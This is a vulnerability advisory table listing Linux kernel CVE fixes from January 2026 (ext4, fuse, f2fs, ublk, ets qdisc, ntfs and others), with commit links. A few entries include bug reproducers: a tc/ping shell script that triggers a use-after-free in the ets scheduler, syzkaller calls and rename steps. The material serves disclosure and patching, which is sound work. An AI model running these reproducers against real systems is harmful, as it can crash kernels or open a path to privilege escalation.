| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: xattr: fix null pointer deref in ext4_raw_inode() If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED), iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all() lacks error checking, this will lead to a null pointer dereference in ext4_raw_inode(), called right after ext4_get_inode_loc(). Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-13 | not yet calculated | CVE-2025-68820 | https://git.kernel.org/stable/c/b72a3476f0c97d02f63a6e9fff127348d55436f6 https://git.kernel.org/stable/c/3d8d22e75f7edfa0b30ff27330fd6a1285d594c3 https://git.kernel.org/stable/c/190ad0f22ba49f1101182b80e3af50ca2ddfe72f https://git.kernel.org/stable/c/b5d942922182e82724b7152cb998f540132885ec https://git.kernel.org/stable/c/5b154e901fda2e98570b8f426a481f5740097dc2 https://git.kernel.org/stable/c/ce5f54c065a4a7cbb92787f4f140917112350142 https://git.kernel.org/stable/c/b97cb7d6a051aa6ebd57906df0e26e9e36c26d14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix readahead reclaim deadlock Commit e26ee4efbc79 ("fuse: allocate ff->release_args only if release is needed") skips allocating ff->release_args if the server does not implement open. However in doing so, fuse_prepare_release() now skips grabbing the reference on the inode, which makes it possible for an inode to be evicted from the dcache while there are inflight readahead requests. This causes a deadlock if the server triggers reclaim while servicing the readahead request and reclaim attempts to evict the inode of the file being read ahead. Since the folio is locked during readahead, when reclaim evicts the fuse inode and fuse_evict_inode() attempts to remove all folios associated with the inode from the page cache (truncate_inode_pages_range()), reclaim will block forever waiting for the lock since readahead cannot relinquish the lock because it is itself blocked in reclaim: >>> stack_trace(1504735) folio_wait_bit_common (mm/filemap.c:1308:4) folio_lock (./include/linux/pagemap.h:1052:3) truncate_inode_pages_range (mm/truncate.c:336:10) fuse_evict_inode (fs/fuse/inode.c:161:2) evict (fs/inode.c:704:3) dentry_unlink_inode (fs/dcache.c:412:3) __dentry_kill (fs/dcache.c:615:3) shrink_kill (fs/dcache.c:1060:12) shrink_dentry_list (fs/dcache.c:1087:3) prune_dcache_sb (fs/dcache.c:1168:2) super_cache_scan (fs/super.c:221:10) do_shrink_slab (mm/shrinker.c:435:9) shrink_slab (mm/shrinker.c:626:10) shrink_node (mm/vmscan.c:5951:2) shrink_zones (mm/vmscan.c:6195:3) do_try_to_free_pages (mm/vmscan.c:6257:3) do_swap_page (mm/memory.c:4136:11) handle_pte_fault (mm/memory.c:5562:10) handle_mm_fault (mm/memory.c:5870:9) do_user_addr_fault (arch/x86/mm/fault.c:1338:10) handle_page_fault (arch/x86/mm/fault.c:1481:3) exc_page_fault (arch/x86/mm/fault.c:1539:2) asm_exc_page_fault+0x22/0x27 Fix this deadlock by allocating ff->release_args and grabbing the reference on the inode when preparing the file for release even if the server does not implement open. The inode reference will be dropped when the last reference on the fuse file is dropped (see fuse_file_put() -> fuse_release_end()). | 2026-01-13 | not yet calculated | CVE-2025-68821 | https://git.kernel.org/stable/c/cbbf3f1bb9f834bb2acbb61ddca74363456e19cd https://git.kernel.org/stable/c/4703bc0e8cd3409acb1476a70cb5b7ff943cf39a https://git.kernel.org/stable/c/cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f https://git.kernel.org/stable/c/fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6 https://git.kernel.org/stable/c/e0d6de83a4cc22bbac72713f3a58121af36cc411 https://git.kernel.org/stable/c/bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: alps - fix use-after-free bugs caused by dev3_register_work The dev3_register_work delayed work item is initialized within alps_reconnect() and scheduled upon receipt of the first bare PS/2 packet from an external PS/2 device connected to the ALPS touchpad. During device detachment, the original implementation calls flush_workqueue() in psmouse_disconnect() to ensure completion of dev3_register_work. However, the flush_workqueue() in psmouse_disconnect() only blocks and waits for work items that were already queued to the workqueue prior to its invocation. Any work items submitted after flush_workqueue() is called are not included in the set of tasks that the flush operation awaits. This means that after flush_workqueue() has finished executing, the dev3_register_work could still be scheduled. Although the psmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(), the scheduling of dev3_register_work remains unaffected. The race condition can occur as follows: CPU 0 (cleanup path) | CPU 1 (delayed work) psmouse_disconnect() | psmouse_set_state() | flush_workqueue() | alps_report_bare_ps2_packet() alps_disconnect() | psmouse_queue_work() kfree(priv); // FREE | alps_register_bare_ps2_mouse() | priv = container_of(work...); // USE | priv->dev3 // USE Add disable_delayed_work_sync() in alps_disconnect() to ensure that dev3_register_work is properly canceled and prevented from executing after the alps_data structure has been deallocated. This bug is identified by static analysis. | 2026-01-13 | not yet calculated | CVE-2025-68822 | https://git.kernel.org/stable/c/ed8c61b89be0c45f029228b2913d5cf7b5cda1a7 https://git.kernel.org/stable/c/a9c115e017b2c633d25bdfe6709dda6fc36f08c2 https://git.kernel.org/stable/c/bf40644ef8c8a288742fa45580897ed0e0289474 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix deadlock when reading partition table When one process (such as udev) opens a ublk block device (e.g., to read the partition table via bdev_open()), a deadlock[1] can occur: 1. bdev_open() grabs disk->open_mutex 2. The process issues read I/O to the ublk backend to read the partition table 3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request() runs bio->bi_end_io() callbacks 4. If this triggers fput() on a file descriptor of the ublk block device, the work may be deferred to the current task's task work (see fput() implementation) 5. This eventually calls blkdev_release() from the same context 6. blkdev_release() tries to grab disk->open_mutex again 7. Deadlock: same task waiting for a mutex it already holds The fix is to run blk_update_request() and blk_mq_end_request() with bottom halves disabled. This forces blkdev_release() to run in kernel work-queue context instead of current task work context, which allows the ublk server to make forward progress and avoids the deadlock. [axboe: rewrite comment in ublk] | 2026-01-13 | not yet calculated | CVE-2025-68823 | https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7 https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: using the num_tqps in the vf driver to apply for resources Currently, hdev->htqp is allocated using hdev->num_tqps, and kinfo->tqp is allocated using kinfo->num_tqps. However, kinfo->num_tqps is set to min(new_tqps, hdev->num_tqps); Therefore, kinfo->num_tqps may be smaller than hdev->num_tqps, which causes some hdev->htqp[i] to remain uninitialized in hclgevf_knic_setup(). Thus, this patch allocates hdev->htqp and kinfo->tqp using hdev->num_tqps, ensuring that the lengths of hdev->htqp and kinfo->tqp are consistent and that all elements are properly initialized. | 2026-01-13 | not yet calculated | CVE-2025-71064 | https://git.kernel.org/stable/c/c149decd8c18ae6acdd7a6041d74507835cf26e6 https://git.kernel.org/stable/c/bcefdb288eedac96fd2f583298927e9c6c481489 https://git.kernel.org/stable/c/6cd8a2930df850f4600fe8c57d0662b376520281 https://git.kernel.org/stable/c/1956d47a03eb625951e9e070db39fe2590e27510 https://git.kernel.org/stable/c/429f946a7af3fbf08761d218746cd4afa80a7954 https://git.kernel.org/stable/c/62f28d79a6186a602a9d926a2dbb5b12b6867df7 https://git.kernel.org/stable/c/c2a16269742e176fccdd0ef9c016a233491a49ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid potential deadlock As Jiaming Zhang and syzbot reported, there is potential deadlock in f2fs as below: Chain exists of: &sbi->cp_rwsem --> fs_reclaim --> sb_internal#2 Possible unsafe locking scenario: CPU0 CPU1 ---- ---- rlock(sb_internal#2); lock(fs_reclaim); lock(sb_internal#2); rlock(&sbi->cp_rwsem); *** DEADLOCK *** 3 locks held by kswapd0/73: #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline] #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389 #1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline] #1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197 #2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890 stack backtrace: CPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043 check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175 check_prev_add kernel/locking/lockdep.c:3165 [inline] check_prevs_add kernel/locking/lockdep.c:3284 [inline] validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908 __lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237 lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868 down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537 f2fs_down_read fs/f2fs/f2fs.h:2278 [inline] f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline] f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791 f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867 f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925 f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897 evict+0x504/0x9c0 fs/inode.c:810 f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853 evict+0x504/0x9c0 fs/inode.c:810 dispose_list fs/inode.c:852 [inline] prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000 super_cache_scan+0x39b/0x4b0 fs/super.c:224 do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437 shrink_slab_memcg mm/shrinker.c:550 [inline] shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628 shrink_one+0x28a/0x7c0 mm/vmscan.c:4955 shrink_many mm/vmscan.c:5016 [inline] lru_gen_shrink_node mm/vmscan.c:5094 [inline] shrink_node+0x315d/0x3780 mm/vmscan.c:6081 kswapd_shrink_node mm/vmscan.c:6941 [inline] balance_pgdat mm/vmscan.c:7124 [inline] kswapd+0x147c/0x2800 mm/vmscan.c:7389 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> The root cause is deadlock among four locks as below: kswapd - fs_reclaim --- Lock A - shrink_one - evict - f2fs_evict_inode - sb_start_intwrite --- Lock B - iput - evict - f2fs_evict_inode - sb_start_intwrite --- Lock B - f2fs_truncate - f2fs_truncate_blocks - f2fs_do_truncate_blocks - f2fs_lock_op --- Lock C ioctl - f2fs_ioc_commit_atomic_write - f2fs_lock_op --- Lock C - __f2fs_commit_atomic_write - __replace_atomic_write_block - f2fs_get_dnode_of_data - __get_node_folio - f2fs_check_nid_range - f2fs_handle_error - f2fs_record_errors - f2fs_down_write --- Lock D open - do_open - do_truncate - security_inode_need_killpriv - f2fs_getxattr - lookup_all_xattrs - f2fs_handle_error - f2fs_record_errors - f2fs_down_write --- Lock D - f2fs_commit_super - read_mapping_folio - filemap_alloc_folio_noprof - prepare_alloc_pages - fs_reclaim_acquire --- Lock A In order to a ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71065 | https://git.kernel.org/stable/c/8bd6dff8b801abaa362272894bda795bf0cf1307 https://git.kernel.org/stable/c/6c3bab5c6261aa22c561ef56b7365959a90e7d91 https://git.kernel.org/stable/c/86a85a7b622e6e8dba69810257733ce5eab5ed55 https://git.kernel.org/stable/c/ca8b201f28547e28343a6f00a6e91fa8c09572fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change zdi-disclosures@trendmicro.com says: The vulnerability is a race condition between `ets_qdisc_dequeue` and `ets_qdisc_change`. It leads to UAF on `struct Qdisc` object. Attacker requires the capability to create new user and network namespace in order to trigger the bug. See my additional commentary at the end of the analysis. Analysis: static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt, struct netlink_ext_ack *extack) { ... // (1) this lock is preventing .change handler (`ets_qdisc_change`) //to race with .dequeue handler (`ets_qdisc_dequeue`) sch_tree_lock(sch); for (i = nbands; i < oldbands; i++) { if (i >= q->nstrict && q->classes[i].qdisc->q.qlen) list_del_init(&q->classes[i].alist); qdisc_purge_queue(q->classes[i].qdisc); } WRITE_ONCE(q->nbands, nbands); for (i = nstrict; i < q->nstrict; i++) { if (q->classes[i].qdisc->q.qlen) { // (2) the class is added to the q->active list_add_tail(&q->classes[i].alist, &q->active); q->classes[i].deficit = quanta[i]; } } WRITE_ONCE(q->nstrict, nstrict); memcpy(q->prio2band, priomap, sizeof(priomap)); for (i = 0; i < q->nbands; i++) WRITE_ONCE(q->classes[i].quantum, quanta[i]); for (i = oldbands; i < q->nbands; i++) { q->classes[i].qdisc = queues[i]; if (q->classes[i].qdisc != &noop_qdisc) qdisc_hash_add(q->classes[i].qdisc, true); } // (3) the qdisc is unlocked, now dequeue can be called in parallel // to the rest of .change handler sch_tree_unlock(sch); ets_offload_change(sch); for (i = q->nbands; i < oldbands; i++) { // (4) we're reducing the refcount for our class's qdisc and // freeing it qdisc_put(q->classes[i].qdisc); // (5) If we call .dequeue between (4) and (5), we will have // a strong UAF and we can control RIP q->classes[i].qdisc = NULL; WRITE_ONCE(q->classes[i].quantum, 0); q->classes[i].deficit = 0; gnet_stats_basic_sync_init(&q->classes[i].bstats); memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats)); } return 0; } Comment: This happens because some of the classes have their qdiscs assigned to NULL, but remain in the active list. This commit fixes this issue by always removing the class from the active list before deleting and freeing its associated qdisc Reproducer Steps (trimmed version of what was sent by zdi-disclosures@trendmicro.com) ``` DEV="${DEV:-lo}" ROOT_HANDLE="${ROOT_HANDLE:-1:}" BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2 PING_BYTES="${PING_BYTES:-48}" PING_COUNT="${PING_COUNT:-200000}" PING_DST="${PING_DST:-127.0.0.1}" SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}" SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}" SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}" cleanup() { tc qdisc del dev "$DEV" root 2>/dev/null } trap cleanup EXIT ip link set "$DEV" up tc qdisc del dev "$DEV" root 2>/dev/null || true tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2 tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \ tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT" tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2 tc -s qdisc ls dev $DEV ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \ >/dev/null 2>&1 & tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0 tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2 tc -s qdisc ls dev $DEV tc qdisc del dev "$DEV" parent ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71066 | https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3 https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9 https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0 https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39 https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs: set dummy blocksize to read boot_block when mounting When mounting, sb->s_blocksize is used to read the boot_block without being defined or validated. Set a dummy blocksize before attempting to read the boot_block. The issue can be triggered with the following syz reproducer: mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0) r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0) ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000) mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00', &(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0) syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0) Here, the ioctl sets the bdev block size to 16384. During mount, get_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)), but since block_size(bdev) > PAGE_SIZE, sb_set_blocksize() leaves sb->s_blocksize at zero. Later, ntfs_init_from_boot() attempts to read the boot_block while sb->s_blocksize is still zero, which triggers the bug. [almaz.alexandrovich@paragon-software.com: changed comment style, added return value handling] | 2026-01-13 | not yet calculated | CVE-2025-71067 | https://git.kernel.org/stable/c/44a38eb4f7876513db5a1bccde74de9bc4389d43 https://git.kernel.org/stable/c/4fff9a625da958a33191c8553a03283786f9f417 https://git.kernel.org/stable/c/b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a https://git.kernel.org/stable/c/d1693a7d5a38acf6424235a6070bcf5b186a360d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: svcrdma: bound check rq_pages index in inline path svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without verifying rc_curpage stays within the allocated page array. Add guards before the first use and after advancing to a new page. | 2026-01-13 | not yet calculated | CVE-2025-71068 | https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9 https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417 https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: invalidate dentry cache on failed whiteout creation F2FS can mount filesystems with corrupted directory depth values that get runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT operations are performed on such directories, f2fs_rename performs directory modifications (updating target entry and deleting source entry) before attempting to add the whiteout entry via f2fs_add_link. If f2fs_add_link fails due to the corrupted directory structure, the function returns an error to VFS, but the partial directory modifications have already been committed to disk. VFS assumes the entire rename operation failed and does not update the dentry cache, leaving stale mappings. In the error path, VFS does not call d_move() to update the dentry cache. This results in new_dentry still pointing to the old inode (new_inode) which has already had its i_nlink decremented to zero. The stale cache causes subsequent operations to incorrectly reference the freed inode. This causes subsequent operations to use cached dentry information that no longer matches the on-disk state. When a second rename targets the same entry, VFS attempts to decrement i_nlink on the stale inode, which may already have i_nlink=0, triggering a WARNING in drop_nlink(). Example sequence: 1. First rename (RENAME_WHITEOUT): file2 → file1 - f2fs updates file1 entry on disk (points to inode 8) - f2fs deletes file2 entry on disk - f2fs_add_link(whiteout) fails (corrupted directory) - Returns error to VFS - VFS does not call d_move() due to error - VFS cache still has: file1 → inode 7 (stale!) - inode 7 has i_nlink=0 (already decremented) 2. Second rename: file3 → file1 - VFS uses stale cache: file1 → inode 7 - Tries to drop_nlink on inode 7 (i_nlink already 0) - WARNING in drop_nlink() Fix this by explicitly invalidating old_dentry and new_dentry when f2fs_add_link fails during whiteout creation. This forces VFS to refresh from disk on subsequent operations, ensuring cache consistency even when the rename partially succeeds. Reproducer: 1. Mount F2FS image with corrupted i_current_depth 2. renameat2(file2, file1, RENAME_WHITEOUT) 3. renameat2(file3, file1, 0) 4. System triggers WARNING in drop_nlink() | 2026-01-13 | not yet calculated | CVE-2025-71069 | https://git.kernel.org/stable/c/7f2bae0c881aa1e0a6318756df692cc13df2cc83 https://git.kernel.org/stable/c/3d95ed8cf980fdfa67a3ab9491357521ae576168 https://git.kernel.org/stable/c/64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb https://git.kernel.org/stable/c/3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5 https://git.kernel.org/stable/c/c89845fae250efdd59c1d4ec60e9e1c652cee4b6 https://git.kernel.org/stable/c/0dde30753c1e8648665dbe069d814e540ce2fd37 https://git.kernel.org/stable/c/d33f89b34aa313f50f9a512d58dd288999f246b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: clean up user copy references on ublk server exit If a ublk server process releases a ublk char device file, any requests dispatched to the ublk server but not yet completed will retain a ref value of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 ("ublk: simplify aborting ublk request"), __ublk_fail_req() would decrement the reference count before completing the failed request. However, that commit optimized __ublk_fail_req() to call __ublk_complete_rq() directly without decrementing the request reference count. The leaked reference count incorrectly allows user copy and zero copy operations on the completed ublk request. It also triggers the WARN_ON_ONCE(refcount_read(&io->ref)) warnings in ublk_queue_reinit() and ublk_deinit_queue(). Commit c5c5eb24ed61 ("ublk: avoid ublk_io_release() called after ublk char dev is closed") already fixed the issue for ublk devices using UBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference count leak also affects UBLK_F_USER_COPY, the other reference-counted data copy mode. Fix the condition in ublk_check_and_reset_active_ref() to include all reference-counted data copy modes. This ensures that any ublk requests still owned by the ublk server when it exits have their reference counts reset to 0. | 2026-01-13 | not yet calculated | CVE-2025-71070 | https://git.kernel.org/stable/c/13456b4f1033d911f8bf3a0a1195656f293ba0f6 https://git.kernel.org/stable/c/daa24603d9f0808929514ee62ced30052ca7221c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/mediatek: fix use-after-free on probe deferral The driver is dropping the references taken to the larb devices during probe after successful lookup as well as on errors. This can potentially lead to a use-after-free in case a larb device has not yet been bound to its driver so that the iommu driver probe defers. Fix this by keeping the references as expected while the iommu driver is bound. | 2026-01-13 | not yet calculated | CVE-2025-71071 | https://git.kernel.org/stable/c/896ec55da3b90bdb9fc04fedc17ad8c359b2eee5 https://git.kernel.org/stable/c/5c04217d06a1161aaf36267e9d971ab6f847d5a7 https://git.kernel.org/stable/c/1ef70a0b104ae8011811f60bcfaa55ff49385171 https://git.kernel.org/stable/c/f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a https://git.kernel.org/stable/c/de83d4617f9fe059623e97acf7e1e10d209625b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: shmem: fix recovery on rename failures maple_tree insertions can fail if we are seriously short on memory; simple_offset_rename() does not recover well if it runs into that. The same goes for simple_offset_rename_exchange(). Moreover, shmem_whiteout() expects that if it succeeds, the caller will progress to d_move(), i.e. that shmem_rename2() won't fail past the successful call of shmem_whiteout(). Not hard to fix, fortunately - mtree_store() can't fail if the index we are trying to store into is already present in the tree as a singleton. For simple_offset_rename_exchange() that's enough - we just need to be careful about the order of operations. For simple_offset_rename() solution is to preinsert the target into the tree for new_dir; the rest can be done without any potentially failing operations. That preinsertion has to be done in shmem_rename2() rather than in simple_offset_rename() itself - otherwise we'd need to deal with the possibility of failure after successful shmem_whiteout(). | 2026-01-13 | not yet calculated | CVE-2025-71072 | https://git.kernel.org/stable/c/4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113 https://git.kernel.org/stable/c/4642686699a46718d7f2fb5acd1e9d866a9d9cca https://git.kernel.org/stable/c/e1b4c6a58304fd490124cc2b454d80edc786665c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: lkkbd - disable pending work before freeing device lkkbd_interrupt() schedules lk->tq via schedule_work(), and the work handler lkkbd_reinit() dereferences the lkkbd structure and its serio/input_dev fields. lkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd structure without preventing the reinit work from being queued again until serio_close() returns. This can allow the work handler to run after the structure has been freed, leading to a potential use-after-free. Use disable_work_sync() instead of cancel_work_sync() to ensure the reinit work cannot be re-queued, and call it both in lkkbd_disconnect() and in lkkbd_connect() error paths after serio_open(). | 2026-01-13 | not yet calculated | CVE-2025-71073 | https://git.kernel.org/stable/c/3a7cd1397c209076c371d53bf39a55c138f62342 https://git.kernel.org/stable/c/cffc4e29b1e2d44ab094cf142d7c461ff09b9104 https://git.kernel.org/stable/c/e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: functionfs: fix the open/removal races ffs_epfile_open() can race with removal, ending up with file->private_data pointing to freed object. There is a total count of opened files on functionfs (both ep0 and dynamic ones) and when it hits zero, dynamic files get removed. Unfortunately, that removal can happen while another thread is in ffs_epfile_open(), but has not incremented the count yet. In that case open will succeed, leaving us with UAF on any subsequent read() or write(). The root cause is that ffs->opened is misused; atomic_dec_and_test() vs. atomic_add_return() is not a good idea, when object remains visible all along. To untangle that * serialize openers on ffs->mutex (both for ep0 and for dynamic files) * have dynamic ones use atomic_inc_not_zero() and fail if we had zero ->opened; in that case the file we are opening is doomed. * have the inodes of dynamic files marked on removal (from the callback of simple_recursive_removal()) - clear ->i_private there. * have open of dynamic ones verify they hadn't been already removed, along with checking that state is FFS_ACTIVE. | 2026-01-13 | not yet calculated | CVE-2025-71074 | https://git.kernel.org/stable/c/b49c766856fb5901490de577e046149ebf15e39d https://git.kernel.org/stable/c/e5bf5ee266633cb18fff6f98f0b7d59a62819eee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: aic94xx: fix use-after-free in device removal path The asd_pci_remove() function fails to synchronize with pending tasklets before freeing the asd_ha structure, leading to a potential use-after-free vulnerability. When a device removal is triggered (via hot-unplug or module unload), a race condition can occur. The fix adds tasklet_kill() before freeing the asd_ha structure, ensuring all scheduled tasklets complete before cleanup proceeds. | 2026-01-13 | not yet calculated | CVE-2025-71075 | https://git.kernel.org/stable/c/c8f6f88cd1df35155258285c4f43268b361819df https://git.kernel.org/stable/c/278455a82245a572aeb218a6212a416a98e418de https://git.kernel.org/stable/c/b3e655e52b98a1d3df41c8e42035711e083099f8 https://git.kernel.org/stable/c/e354793a7ab9bb0934ea699a9d57bcd1b48fc27b https://git.kernel.org/stable/c/a41dc180b6e1229ae49ca290ae14d82101c148c3 https://git.kernel.org/stable/c/751c19635c2bfaaf2836a533caa3663633066dcf https://git.kernel.org/stable/c/f6ab594672d4cba08540919a4e6be2e202b60007 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Limit num_syncs to prevent oversized allocations The OA open parameters did not validate num_syncs, allowing userspace to pass arbitrarily large values, potentially leading to excessive allocations. Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS, returning -EINVAL when the limit is violated. v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh) (cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b) | 2026-01-13 | not yet calculated | CVE-2025-71076 | https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Cap the number of PCR banks tpm2_get_pcr_allocation() does not cap any upper limit for the number of banks. Cap the limit to eight banks so that out of bounds values coming from external I/O cause only limited harm. | 2026-01-13 | not yet calculated | CVE-2025-71077 | https://git.kernel.org/stable/c/8ceee7288152bc121a6bf92997261838c78bfe06 https://git.kernel.org/stable/c/275c686f1e3cc056ec66c764489ec1fe1e51b950 https://git.kernel.org/stable/c/ceb70d31da5671d298bad94ae6c20e4bbb800f96 https://git.kernel.org/stable/c/d88481653d74d622d1d0d2c9bad845fc2cc6fd23 https://git.kernel.org/stable/c/b69492161c056d36789aee42a87a33c18c8ed5e1 https://git.kernel.org/stable/c/858344bc9210bea9ab2bdc7e9e331ba84c164e50 https://git.kernel.org/stable/c/faf07e611dfa464b201223a7253e9dc5ee0f3c9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/64s/slb: Fix SLB multihit issue during SLB preload On systems using the hash MMU, there is a software SLB preload cache that mirrors the entries loaded into the hardware SLB buffer. This preload cache is subject to periodic eviction - typically after every 256 context switches - to remove old entries. To optimize performance, the kernel skips switch_mmu_context() in switch_mm_irqs_off() when the prev and next mm_struct are the same. However, on hash MMU systems, this can lead to inconsistencies between the hardware SLB and the software preload cache. If an SLB entry for a process is evicted from the software cache on one CPU, and the same process later runs on another CPU without executing switch_mmu_context(), the hardware SLB may retain stale entries. If the kernel then attempts to reload that entry, it can trigger an SLB multi-hit error. The following timeline shows how stale SLB entries are created and can cause a multi-hit error when a process moves between CPUs without an MMU context switch. CPU 0 CPU 1 ----- ----- Process P exec swapper/1 load_elf_binary begin_new_exc activate_mm switch_mm_irqs_off switch_mmu_context switch_slb /* * This invalidates all * the entries in the HW * and setup the new HW * SLB entries as per the * preload cache. */ context_switch sched_migrate_task migrates process P to cpu-1 Process swapper/0 context switch (to process P) (uses mm_struct of Process P) switch_mm_irqs_off() switch_slb load_slb++ /* * load_slb becomes 0 here * and we evict an entry from * the preload cache with * preload_age(). We still * keep HW SLB and preload * cache in sync, that is * because all HW SLB entries * anyways gets evicted in * switch_slb during SLBIA. * We then only add those * entries back in HW SLB, * which are currently * present in preload_cache * (after eviction). */ load_elf_binary continues... setup_new_exec() 